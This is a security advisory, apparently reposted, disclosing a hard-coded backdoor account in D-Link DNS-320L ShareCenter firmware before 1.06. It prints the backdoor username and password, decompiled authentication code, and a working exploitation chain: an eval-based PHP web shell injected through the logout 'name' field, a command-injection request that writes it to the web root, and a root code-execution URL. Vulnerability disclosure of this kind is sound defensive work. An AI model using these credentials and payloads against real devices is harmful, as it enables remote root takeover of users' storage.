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dns 320l php,D-Link DNS-320L ShareCenter Backdoor Account / Remote Root

孙思源
2023-12-01

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GulfTech Research and Development

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# D-Link DNS-320L ShareCenter Backdoor #

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Released Date: 2018-01-03

Last Modified: 2017-06-14

Company Info: D-Link

Version Info:

Vulnerable

D-Link DNS-320L ShareCenter < 1.06

Possibly various other ShareCenter devices

Not Vulnerable

D-Link DNS-320L ShareCenter >= 1.06

--[ Table of contents

00 - Introduction

00.1 Background

01 - Hard coded backdoor

01.1 - Vulnerable code analysis

01.2 - Remote exploitation

02 - Credit

03 - Proof of concept

04 - Solution

05 - Contact information

--[ 00 - Introduction

The purpose of this article is to detail the research that GulfTech has

recently completed regarding the D-Link DNS 320L ShareCenter.

--[ 00.1 - Background

D-Link Share Center 2-Bay Cloud Storage 2000 (DNS-320L) aims to be a

solution to share, stream, manage and back up all of your digital files by

creating your own personal Cloud.

--[ 01 - Hard coded backdoor

While doing some research on another device, I came across a hard coded

backdoor within one of the CGI binaries. Several different factors such as

similar file structure and naming schemas led me to believe that the code

that was in the other device was also shared with the DNS-320L ShareCenter.

As it turned out our hunch was correct. An advisory regarding the other

vulnerable device in question will be released in the future, as the vendor

for that device is still in the process of addressing the issues.

Now, let's take a moment to focus on the following file which is a standard

Linux ELF executable and pretty easy to go through.

/usr/local/modules/cgi/nas_sharing.cgi

The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" and

contains the following function that is used to authenticate the user.

--[ 01.1 - Vulnerable code analysis

Below is the psuedocode created from the disassembly of the binary. I have

renamed the function to "re_BACKDOOR" to visually identify it more easily.

struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)

{

const char *v2; // r5@1

const char *v3; // r4@1

struct passwd *result; // r0@4

FILE *v5; // r6@5

struct passwd *v6; // r5@7

const char *v7; // r0@9

size_t v8; // r0@10

int v9; // [sp+0h] [bp-1090h]@1

char s; // [sp+1000h] [bp-90h]@1

char dest; // [sp+1040h] [bp-50h]@1

v2 = a2;

v3 = a1;

memset(&s, 0, 0x40u);

memset(&dest, 0, 0x40u);

memset(&v9, 0, 0x1000u);

if ( *v2 )

{

v8 = strlen(v2);

_b64_pton(v2, (u_char *)&v9, v8);

if ( dword_2C2E4 )

{

sub_1194C((const char *)&unk_1B1A4, v2);

sub_1194C("pwd decode[%s]\n", &v9);

}

}

if (!strcmp(v3, "mydlinkBRionyg")

&& !strcmp((const char *)&v9, "abc12345cba") )

{

result = (struct passwd *)1;

}

else

{

v5 = (FILE *)fopen64("/etc/shadow", "r");

while ( 1 )

{

result = fgetpwent(v5);

v6 = result;

if ( !result )

break;

if ( !strcmp(result->pw_name, v3) )

{

strcpy(&s, v6->pw_passwd);

fclose(v5);

strcpy(&dest, (const char *)&v9);

v7 = (const char *)sub_1603C(&dest, &s);

return (struct passwd *)(strcmp(v7, &s) == 0);

}

}

}

return result;

}

As you can see in the above code, the login functionality specifically

looks for an admin user named "mydlinkBRionyg" and will accept the password

of "abc12345cba" if found. This is a classic backdoor. Simply login with

the credentials that were just mentioned from the above code.

--[ 01.2 - Remote exploitation

Exploiting this backdoor is fairly trivial, but I wanted a root shell, not

just admin access with the possibility of shell access. So, I started

looking at the functionality of this file and noticed the method referenced

when the "cmd" parameter was set to "15". This particular method happened

to contain a command injection issue. Now I could turn this hard coded

backdoor into a root shell, and gain control of the affected device.

However, our command injection does not play well with spaces, or special

characters such as "$IFS", so I got around this by just playing ping pong

with pipes, and syslog() in order to create a PHP shell. These are the

steps that I took to achieve this.

STEP01: We send a logout request to /cgi-bin/login_mgr.cgi?cmd=logout with

the "name" parameter value set to that of our malicious PHP wrapper code

within our POST data. This "name" parameter is never sanitized.

name=<?php unlink(__FILE__);eval($_REQUEST[01100111]);?>

At this point we have successfully injected our payload into the user logs,

as the name of the user who logouts is written straight to the user logs. A

user does not have to be logged in, in order to logout and inject data.

STEP02: We now use cat to readin the user log file and pipe it out to the

web directory in order to create our PHP web shell.

GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=mydlinkBRionyg&passwd=YWJjMT

IzNDVjYmE&system=cat/var/www/shell.php HTTP/1.1

At this point an attacker can now simply visit the newly created web shell

and execute any PHP code that they choose, as root.

http://sharecenterhostname/shell.php?01100111=phpinfo();

By sending a request like the one above a remote attacker would cause the

phpinfo() function to be displayed, thus demonstrating successful remote

exploitation as root.

--[ 02 - Credit

James Bercegay

GulfTech Research and Development

--[ 03 - Proof of concept

We strive to do our part to contribute to the security community.

Metasploit modules for issues outlined in this paper can be found online.

--[ 04 - Solution

Upgrade to firmware version 1.06 or later. See the official vendor website

for further details.

--[ 05 - Contact information

Web

https://gulftech.org

Mail

security@gulftech.org

Copyright 2018 GulfTech Research and Development. All rights reserved.

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